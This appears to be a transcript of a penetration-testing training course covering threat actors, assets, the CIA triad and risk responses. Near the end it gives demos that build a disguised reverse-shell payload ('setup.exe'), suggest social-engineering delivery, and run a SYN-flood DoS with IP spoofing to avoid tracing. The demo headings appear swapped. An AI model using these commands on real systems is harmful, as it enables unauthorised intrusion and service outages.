also a harm. And the person who has done it is a threat actor. So in nutshell, threat
actors are responsible for a threat.
They could be a group, a person, or any other entities. A threat actor is basically a
person or a group that has malicious intent and wants to break into security of a
system or a network. This means threat actor wants to cause some sort of harm to
the information that either resides on your network or somewhere else outside your
network. But they mean to cause a harm.
There are different types of threat actors, who are divided into different categories
based on their skillsets. So there could be a threat actor who is a newbie, who uses
predefined tools and scripts by the other threat actors. [Video description
begins] The following information is displayed on screen: A threat actor is
categorized into a type based on the skillset and intent. [Video description ends]
And then there could be a set of threat actors who are highly skilled and use
sophisticated methods to steal information or cause harm to the information that
resides on your network. A threat actor basically looks for vulnerabilities that can
be exploited. So if there are no vulnerabilities in a web application or in the
network, then threat actors cannot do anything.
A threat actor would basically look for vulnerabilities that can be exploited. This
means that they are looking for something to cause harm with. So they are looking
for information that can be leaked out or can be destroyed or can be modified. Or
they are trying to bring down a network or rip apart a web application, which
means they want to extract the information from the back end database and make it
public or use it for their own benefits.
So going ahead, in nutshell, threat actors are looking for vulnerabilities that can be
exploited. This means if no vulnerabilities exist within a web application or a
network or a server, threat actors cannot do anything. Therefore, they are only
looking for something that can be exploited, without which threat actors cannot
exist. So if there are no vulnerabilities, there are no threat actors.
Moving ahead, let's look at the categories of threat actors. So the first one is
external threat actors. These are the individuals, groups, or organizations that are
not authorized to access the system. However, they use illegal means and get access
to the systems of an organization. Systems here could be a server, it could be the
entire network, or it could be a web application or a web server.
Since they do not belong to this organization, they can cause more severe harm and
damage to the systems of the organization. These people can be low-skilled, which
are known as script kiddies. Or they could be advanced agents, who are highly
skilled and can use sophisticated tools.
Moving on, internal threat actors are the ones who are usually the employees of the
organization or they are associated with the organization as a contractor or as a
vendor. They can cause, accidentally or intentionally, they can cause damage to the
information or the assets of the organization. This means that somebody might
unknowingly delete a critical set of data.
And if you talk about intentionally, somebody who is moving out of the
organization, which means the employee who is leaving the organization, before
leaving, this person deletes a critical piece of information. Now the internal threat
actors are privileged to access the resources of the organization. Now the access
may vary from employee to employee. So for example, if you talk about the CEO
of the organization may have access to all the information that resides on the
network, whereas a person lower in the hierarchy may have only limited access.
Now the third part is the natural threat actors. These could be floods, these could be
hurricane or thunderstorm, which could cause damage to the systems or the
network. Now if your office is situated in a location where there are rivers nearby
and if there is a flood that happens, then there is a possibility that the building
might get impacted, which means the network also is likely to get impacted.
There may be indirect impact. Now the service provider of the Internet connectivity
is located in a location which is impacted by heavy flood. Now the connectivity is
down. So therefore, you are also indirectly impacted by this natural threat. Moving
on, let's look at different types of threat actors. Previously, we defined what a threat
actor is.
Now we are going to look at different types of threat actors. The first one is
hackers. Hackers have an intention to cause damage or destroy data. They will do
this or simply they will steal the data and sell it in the black market or in the
underground Internet. So their main intention is they want to cause damage. Then
you have hacktivists, who have a political or social reason. They will attack an
organization or a political party because they want to fulfill a social or political
reason.
Then comes nation states, who focus on hacking into either military or the
nation. [Video description begins] The following information is displayed on
screen: Nation states/State-sponsored. [Video description ends] They are well
sponsored. They are well funded by large groups or a different nation. Then comes
script kiddies, who use predefined tools and don't have much knowledge into
hacking. So they will try to use these tools to gain access to a network or a system.
Then comes insider actors, who are internal employees. We just discussed what
insider threat actors were. They are the employees or associated vendors or
contractual employees who work with the organization. They some level of access
to the system and the information.
Then comes Advanced Persistent Threats, or APTs, who are able to conduct highly
sophisticated attacks and can remain undetected for a long time. Moving on,
organized crime threat actors, they are mostly after the money. They will hack into
large financial organizations or they will hack into banks or any other organization
to gain access to the information which can reward them with monetary benefits.
Types of Assets
[Video description begins] Topic title: Types of Assets. Your host for this session is
Ashish Chugh. [Video description ends]
Now let's look at what an asset is. Asset is something that has discrete value for the
organization, which means anything that brings out a value for an organization can
be considered an asset. Asset could be of different types. It could be even
something like hardware or it could be software. Even people are considered to be
assets.
In an organization, assets will continue to change, which means old ones are
removed or discarded and the new ones are added. A simple example in this
context could be you have servers which are outdated. You need to remove those
and you need to bring in new servers. Or a web application is outdated. Now you
need to upgrade it to new version.
So therefore, along with the change in assets, the vulnerabilities and threats will
also change. Therefore, it is essential that you know what kind of assets you are
holding and what kind of value do they bring out for you. Now asset can also have
an owner, somebody who owns the asset. Then there could also be a custodian,
which means somebody who manages the asset.
A simplest example could be that there is a folder on a server that contains various
critical files. The owner of that folder is the CEO of the organization. However,
there is a designated person in the IT team who manages that folder for the CEO,
which means that person assigns or removes access for individuals as and when
directed by the CEO.
Let's now look at different types of assets. There can be different types. The first
one we can talk about is people. These are the employees, nonemployees, which
means they are third-party vendors, consultants, contractors. Moving on, then asset
could be a hardware, which means they could be system devices, networking
devices, or peripherals that are available on the network.
Then you have software, which includes applications. Now applications could be
custom made. They could be freeware, open source, off-the-shelf. Whatever is your
organization using, that becomes an asset as long as it is in the software form. Then
comes the data, which is the information. Now data could be of two types. It could
be digital, it could be paper.
When you talk about digital information or digital data, it can be transmitted,
stored, processed, or archived. Now all these formats, no matter how it is stored or
how it is processed, archived or transmitted, that data or the information is the
asset. Same goes for paper. Now if there is a legal compliance that you need to
follow to keep the information in the paper form, that you have to very carefully
ensure that paper data or the information on the paper is secured properly.
Moving on, then you have physical environment, which could be a building, which
could be an infrastructure of the organization. It can include offices, electricity, air
conditioning. Then comes the processes. Along with processes, you can also have
procedures and policies. Each organization will have IT and business standard
procedures, processes, and policies.
Now these have to be considered as a type of asset. Because an organization could
have standard procedures and policies and it could also have sensitive procedures
and policies. Depending on what type of procedures or policies or processes that
you are dealing with, some of them can be made public and some need to remain
confidential within the organization.
Then you have third parties, which could also include your vendors and
contractors. And this is not only related to IT services. It can also be related to
guards, legal services, or online services that you have adopted. It could be
something like Dropbox or Gmail or Hotmail that you are using. Then finally
comes the communication channels, which could be messaging servers in the form
of e-mails or it could be file-sharing services that you are using.
Let's now look at CIA Triad and how it fits in dealing with the information. So first
one is confidentiality, which means that information is available only on the needto-know basis. So if you do not have access to something, you will not be able to
access that particular folder or file on the network. Then comes integrity, which
means information is protected from any type of unauthorized tampering or
modification.
Finally, availability, which means information is available as and when required to
the designated individuals. This goes back to confidentiality, meaning that if you
are not the designated individual, you will not have access to the information.
Let's now look at the dangers to various types of assets. First one is people. When
talking about people, if they have been victim of a social engineering attack, they
can disclose or leak out the information. [Video description begins] In the onscreen
diagram, “Leaked, disclosure” falls under the following heading:
Confidentiality. [Video description ends]
People can also alter the integrity of the information, which means they alter or
modify the data. The data can also be stolen from people or data could be
accidentally or intentionally deleted. [Video description begins] In the onscreen
diagram, “Stolen, deleted” falls under the following heading: Availability. [Video
description ends]
When you talk about hardware, it is only the matter of availability which impacts
them. So hardware could be stolen, it could be destroyed, or it could fail. For
example, a server holding critical data, which does not have backup, unfortunately
fails. So the availability of data is not there. Then you move on to software. A
software confidentiality can be altered or it could be malware infected.
Now let's look at software. So as far as confidentiality is concerned, with software,
the data can be altered or it could be infected with malware. Let's take an example
of a database. Using a tool like sqlmap, you can connect to the back end database of
a web application and alter the information. Now integrity of the data can also be
compromised, which means somebody has made an unauthorized copy of the data.
Availability of the data can also be in danger when the data is either corrupted or
intentionally or accidentally deleted.
Now let's look at how data or information is impacted in terms of confidentiality,
integrity, and availability. Confidentiality of data can be impacted by unauthorized
access. So remember, going back to the definition of confidentiality, it is only
need-to-know basis. Now if you do not have access on a particular folder on the
network and you by some means gain access to that particular folder, you have
made an unauthorized access. So the confidentiality of the data is in danger.
Now how is the integrity impacted? Somebody can modify the data. Or there is a
version change of a particular document which you are not aware of or which was
not supposed to be made. Therefore, the document version changes but it is the
unintentional change.
Then comes the availability of data. Data could be deleted or it could simply be
denied access to a particular individual who needs to have access. When you talk
about physical environment, it is the availability that is most impacted. So there
could be a break-in or there could be a destruction, which could probably impact
the office or the servers that are located within the premises.
Then you move ahead to processes. Now integrity of the process can be impacted if
the process is altered without permission, which means the process was not
supposed to be changed but it has been changed. Now the integrity of the process is
impacted. Even if somebody is not following the process, impacts the integrity of
the process. For example, if there is a specific process you have to follow when you
have to set up a server. But if you do not follow that process, the integrity of the
process is in danger.
Then comes the availability. Now if processes are not available, then there is a
problem. And these processes have to be available at the time that they are
required. So for example, a vague example could be something like a new person
has joined the IT team but he has not been briefed about the IT processes. He goes
and sets up a web application without knowing the process. So for this person, the
process was not available.
Let's now move to third parties. How is confidentiality impacted? A vendor could
make unauthorized access to a particular folder or file on the network. Integrity gets
impacted when the vendor or the contractor modifies the data and changes the
version of a file.
Availability is impacted when the vendor or the third-party individual, which could
be a consultant or a contractor as well, deletes a particular file or changes the access
permission on a particular folder or file. [Video description begins] In the onscreen
diagram, this third-party danger is written as follows: Deleted, access
denied. [Video description ends]
Moving on to communication channels, now confidentiality is reading the message
which you are not supposed to read. So for instance, if you are fixing up
somebody's laptop, let's say, a senior official's laptop in your organization and the
Outlook is open, there is a confidential message that comes from the CEO. You
open that message and you read it. Now the confidentiality of that message is lost.
When you talk about the integrity, there is unauthorized capture. So you are part of
the IT team, you are capturing the flow of information that is happening on the
network. So for instance, you are capturing data. You are doing packet capturing
and you are recording those packets for later analysis. Meanwhile, somebody is
accessing a website which runs on HTTP protocol. Now because the
communication is happening in clear text, you are able to not only record the
information but you're also able to capture the username and password of this
individual.
Availability is impacted when you delete or destroy the communication channel or
its output, something like an e-mail. So if there is a critical e-mail that you delete,
then the availability of that communication channel is destroyed.
Types of Risk Responses
[Video description begins] Topic title: Types of Risk Responses. Your host for this
session is Ashish Chugh. [Video description ends]
There are different definitions of a risk, which can be defined in a generic way or in
the context of information security. Essentially, risk is the potential of losing
something that has a value, which may be high or low based on the situation. For
example, a system exposed to the Internet has a higher risk of threats as compared
to a system that is not exposed to the Internet.
Risk does not exist in present, it is always in the future. Therefore, it may impact
future events. In generic sense, a risk is a potential problem that may or may not
happen. Another way to define risk is as a potential of an action or activity that
results in an undesirable outcome or a loss. For example, there is a risk of financial
loss due to a attack conducted by a hacker. We have to also understand, risk cannot
always be eliminated. There will be one risk or the other.
Depending on the current state of the organization or current state of the
infrastructure or the type of security that you have implemented, there will be one
or more risks that will always be present. For instance, take an example of a
firewall. Now what could be a risk associated with a single firewall that you have
to filter out the incoming and the outgoing traffic? Now the risk is the firewall can
fail. That may or may not happen, but this is a risk. So how do you avoid that risk?
You put a redundant firewall in place. That is how you can mitigate that particular
risk.
Let's now look at some of the risk examples. Risks are unavoidable and they can be
related from day-to-day life to everything. For example, if you are driving a car at a
very high speed, there are chances that there is an accident will take place. That is
the risk in this situation. Or another example in the context of information security,
if your antivirus application is not updated, then there is a risk that a malware will
get into the system.
Let's look at some of the risk examples. First one is non-compliance to a policy,
which we can assume is a security policy. The risk is that the users may not follow
the security policy. Then you have loss of information or data. A server's hard drive
failing is a risk in this situation, which can cause the loss of information or data.
There is a risk of Denial of Service, or DoS, attack. If you do not protect your
infrastructure, which is the servers and the endpoints or the firewall, if they are not
protected or configured properly, there are chances that there will be a DoS attack.
Then we come to information breach, which is a risk if there is no proper access
control permissions defined. Then we are talking about floods. Flood is also a risk.
If your office is situated in a city which is nearby rivers or the sea or the ocean,
then there are chances that flood may happen. This is a risk.
Let's now look at risk-based frameworks. Risk-based framework is also known as
risk-based approach. Risk management is an ongoing process that aims at
minimizing the risk and losses to the organization. There are several phases in the
risk management process which cover the risk-based approach. When you follow
the risk management process, you accurately and strategically implement and
enable the organization to improve their decision-making capabilities regarding the
risks.
When you are talking about the risk-based framework, which is part of the risk
management process, we have to decide what is important to protect. So in this,
you have to define the boundaries within which the risk-based decisions are made.
You have to identify the assets, you have to categorize them, you have to evaluate
them, and you have to prioritize them.
And therefore, you have to ensure you have concluded or you have narrowed down
the assets which are most critical to protect and which are not. So therefore, you
have to identify the threats and vulnerabilities that impact these particular assets.
Then you have to determine how to protect the assets. In this process, you have to
use the risk management process to examine the impact of threats and
vulnerabilities of the assets in the context of the system environment. And you have
to also determine the risks that are faced by the assets. This entire set of activities is
part of the risk assessment process, which is a critical step in developing an
effective risk management strategy. We, at any cost in this process, need to know
how to protect our assets from the threats.
Later on, then you move to the risk control method, which is application of controls
to reduce the risks to an organization's data and information systems. This is to
identify which approach is more adequate or appropriate to protect the assets and
the information. You have to prioritize, evaluate, and implement approaches and
risk control measures in the risk assessment process.
Then finally, you have to move to risk monitoring, which is monitor and improve
the controls. There are multiple reasons why would you want to monitor and
improve the controls. When you are monitoring risks, you have to keep track of
identified risks, monitor them, and identify new risks. You have to also determine
the effectiveness of executed risk response plan in reducing risks.
Finally, you have to also ensure that there are risk management policies and
methods that are in compliance to the organization's missions and objectives, which
means that you cannot define a risk management strategy that does not align with
the organization's mission and objective. You have to ensure that everything is on
the single line, your risk management processes and methods are in sync with the
organization's business objective and the vision.
So how do you improve the controls after that? This is an iterative step in which
you will continue to test the controls that you have implemented, and these
controls, I'm being very specific to the security controls. And you have to continue
to evaluate your assets and see if there are vulnerabilities that still exist into the
system. And then based on those vulnerabilities, if they exist, you have to apply
better controls.
Let's now understand the types of risk responses. There are different types of risk
responses that you can have against a particular risk. Therefore, it is up to you,
depending on the situation, how do you want to handle a particular risk or rather
how do you want to respond to a particular risk. It could be risk reduction, risk
avoidance, risk transfer, or risk acceptance. Let's first look at the risk reduction.
This is the most common method to manage risks. In this method, you will put in
control measures to reduce the impact of the risk.
The second method is risk avoidance. Risk avoidance is ideally the best way in
some of the situations. In this method, you will eliminate all those activities or
unwanted situations that can expose assets to risks in the first place. It includes
complete elimination of all the vulnerabilities in the system, which in realistic
situation is not possible. So therefore, risk avoidance is good in some situations but
it may not work out in all situations.
Then we talk about risk acceptance. There are times when the cost of
countermeasure is too high and the loss due to a particular risk is relatively less.
Therefore, the organization might simply accept the risk and take no action against
it. Because the loss is relatively very low in comparison to the countermeasure you
are going to put into the place. However, it is not recommended that you should
accept the risk.
But in certain situations, you would have to do that. And if you do it, then you must
also properly document the risk and review it regularly to ensure that the potential
loss is within the limits of what your organization can accept. Typically, you would
go with risk acceptance when you know the countermeasure is either very difficult
to implement or it is costing too much or it is very time consuming. After all,
longer the time, more cost you are going to incur.
Therefore, you always look at the cost side of implementing a countermeasure to a
risk. If it is too high and the risk is very low in comparison to that, then you might
as well accept that. Finally, we are looking at risk transfer. This is a method where
the responsibility to address potential damage due to a risk is transferred to a third
party. This could be a third-party vendor or it could be a third-party service
provider where you simply pass on the responsibility of addressing the risk.
Let's now look at some of the examples. So first example we would look at is risk
reduction. So how do you reduce the risk? Installing a badge system. Why would
you want to install a badge system at the entry of your building? Because you want
to reduce the risk of unauthorized entry. If you do not have the badge, you cannot
simply walk into the building or your office. But if you have a badge system, then
you have to swipe that and you make an authorized entry.
Another example is installing a firewall. You reduce the risk of network being
attacked if you install a firewall. If you do not install it, then the risk is very high
and probability of an attack taking place on the network is also very high.
Let's now look at the examples of risk avoidance. Let's assume you've been handed
over a complex project. How do you handle that complex project? One is simply
you go ahead and do it. But that is not risk avoidance. The risk avoidance in this
scenario would be you change the scope of a project, reduce the complexity, and
then continue to do the project.
Another example could be buying a commercial product. In this situation, you
avoid the risk of using an open-source product. And how are you avoiding the risk
in this scenario? Open-source typically do not have regular updates or upgrades. Or
there is no ownership of a particular entity in most cases who can own the opensource product. In such a scenario, you do not know where to get the updates. If
you find a bug, you don't know who is going to fix it.
So rather, you avoid this risk and you go for a commercial product of the similar
nature. Now there is an organization that owns the product. You have paid a fee to
buy that product or use that product services. Therefore, you have avoided the risk
of not getting updates or regular upgrades.
Let's now talk about risk acceptance. One of the examples could be approved
deviation from a security policy. Now there is a security policy in the organization.
Everybody has to stick to it, adhere to it. Now if there is a deviation that is
happening, you are taking an approval to deviate from the security policy. That
means you are accepting the risk which may happen due to this particular
deviation. If the management is fine with it, management has okayed the deviation,
that means they are also accepting the risk.
Now let's assume that you have a in-house built application. You find a small bug.
But you accept the risk because it is going to take a lot of time for your team to fix
that bug and release a new update on the application. You do not find that time and
the money worth fixing that particular bug.
And more specifically, if you know this particular application is hosted only in the
intranet and it is not visible to the Internet or not hosted on the Internet, then you
know that you can very well accept that risk. The attack cannot happen on that
particular application directly from the Internet. So you are ready to accept that bug
and move ahead with the risk.
Let's now look at risk transfer examples. One of the biggest example would be
purchasing an insurance. So you purchase insurance for your infrastructure. If any
earthquake or anything happens and your infrastructure is destroyed, then you
know there is an insurance. Even though you will not be able to get the data back,
but at least the hardware infrastructure can be purchased back if there is an
insurance. So here you have transferred the risk to that particular infrastructure to a
third party, which is an insurance company.
Let's also assume another scenario where in a project you have come across a
complex task. You do not think that your team has the capability to handle that
complex task, or they may take a longer time to complete the complex task. In this,
you can simply transfer the risk of completing this complex task to a third party.
Metasploit Framework
[Video description begins] Topic title: Metasploit Framework. Your host for this
session is Ashish Chugh. [Video description ends]
In this demo, we will be using a tool called MSFvenom, which is designed to create
custom payloads. [Video description begins] The Kali Linux application is
open. [Video description ends] You already have a tool called Metasploit
Framework in Kali Linux that has several predefined payloads. But with
MSFvenom, you can create a custom payload without getting into Metasploit
Framework. MSFvenom combines two tools that were earlier available, which are
known as MSFpayload and MSFencode.
To be able to use MSFvenom, you simply need to open the terminal window and
there is detailed help available with MSFvenom. So you type the command
msfvenom -h. You will see lot of parameters or the switches that you can use. So
we will use some of these parameters in the next command that we are going to
execute and to create a custom payload. We will use some of these parameters or
the switches when we create a custom payload.
Before creating the custom payload, there are several payloads that are already
available in MSFvenom that you can use to create your custom payload. Let's see
some of these. So type the command msfvenom -l payloads. There are several
switches or parameters that are available with MSFvenom. To view them, you
simply need to execute the command msfvenom -h. You get a complete list.
Let's clear the window and see the payloads that are available with MSFvenom. So
you type the command msfvenom -l payloads. So you get a complete list of the
payloads that you can use to create your own custom payload. Let's create a custom
payload. Type the following command: msfvenom -p
windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o setup.exe.
Now in this particular command, we have used various parameters. So let's look at
-p. [Video description begins] The presenter types the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o
setup.exe. [Video description ends] If you need to use a module that is already
predefined in MSFvenom, you need to selected by putting the -p parameter; -f
helps us to define the file format, and -o is the saving of the file, which is setup.exe.
Let's execute this command. So note the output. So it's already created a setup.exe
as the payload. Since there was no architecture defined, so it chooses x86 as the
default architecture for the payload. The payload file size is 341 bytes, and the final
size of the exe file is 73802 bytes. Saved as...So let's verify if this file has been
created. So we execute the command ls -l. Note that there is a setup.exe that has
already been defined.
Next you need to use social engineering or any other method to deploy this
setup.exe to the target system. So for instance, you can use a USB. Copy this file
into the USB and plug into any system, execute it from there, and start the
MSFconsole and the Meterpreter. Start the Metasploit Framework to get access to
the target system. Another option is to simply host this file on a web server and let
the target download the file so that it can be executed. So that's it for the
MSFvenom demo. We are done with it, and thank you very much.
MSFvenom
[Video description begins] Topic title: MSFvenom. Your host for this session is
Ashish Chugh. [Video description ends]
In this demo, we are going to use Metasploit Framework, which is a penetration
testing framework. It is widely used by the hackers and pentesters across the world.
It is part of Kali Linux and can be downloaded separately from the Metasploit
Framework website. [Video description begins] The Kali Linux application is open.
It comprises a "Favorites" bar that includes the Metasploit Framework
icon. [Video description ends]
To be able to use Metasploit Framework, you need to first start it, click on this
Metasploit Framework. [Video description begins] A terminal opens. [Video
description ends] It does the initial configuration. So first it starts the database; then
creates a user called msf; creates a database, msf, and then another database called
msf_test; then creates the configuration file and the initial database schema.
Once all this is done, you get to see the msf5 prompt. Now if you notice, just above
the prompt, it says 1914 exploits and 556 payloads. Now this number may vary. As
and when you update Kali Linux and...As and when you update Kali Linux or
update Metasploit Framework, number is likely to change. So let's start to create.
Metasploit Framework can be used in different ways to exploit a system. So either
you can simply gain control of the system or you can even bring it down by
initiating a denial-of-service attack. It depends what your intent is, but this is the
tool that you definitely want to use. So in this demo, we are going to perform a
denial-of-service or a DoS attack on a Windows 10 system. To keep the demo
within the scope, we are only going to use Kali Linux and Metasploit Framework.
So let's use the following command. You need to first use the use command to
select a specific payload. So in this, we type use. So we type the command use
auxiliary/dos/tcp/synflood. So this particular module has been selected. Now we
need to set the target host. So for this, we use the command set RHOST, let's say,
the IP address of the target system is 43. So we use the command set RHOST
192.168.43.198.
Now we need to select the port that we want to use. So we use the command
RPORT, let's say, it is port 21 which is the FTP. [Video description begins] The
presenter types the following command: set RPORT 21. [Video description
ends] Now if you do not spoof your own IP address, it is most likely that the attack
can be traced back to you. So it is better to spoof your IP address. So we will do
that with the command set SHOST, then we will simply type any random IP
address. So this has been done.
Now we can also set the time-out; let's say, 50000. So use the command set
TIMEOUT 50000. So we are all set, now we have to simply say exploit. Now if
this system is alive, on the other end, 192.168.43.198, and port 21 is open, this
system in no time will go down. Because there will be SYN flooding happening to
that system, which will eventually drain the system out of it resources, and the
system is likely to go down. So this is one simple method of bringing down a
system. This is also known as exploiting the system. That's it for this demo. Thank
you.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the role of penetration testing and how it
fits into a security program. We did this by covering the need of pen testing and
how it fits into a security program. We also learned about pen testing mindset and
how it affects the security. We also learned about different levels of penetration
testing, and we also focused on weaknesses of penetration testing.
Later in the course, we also learned the types of tools that can be used for
penetration testing. So this concludes the Security Consultant journey. In the next
course, we will learn about forensics analyst. [Video description begins] The
following information is displayed on screen: End-User Security
Awareness. [Video description ends]
Download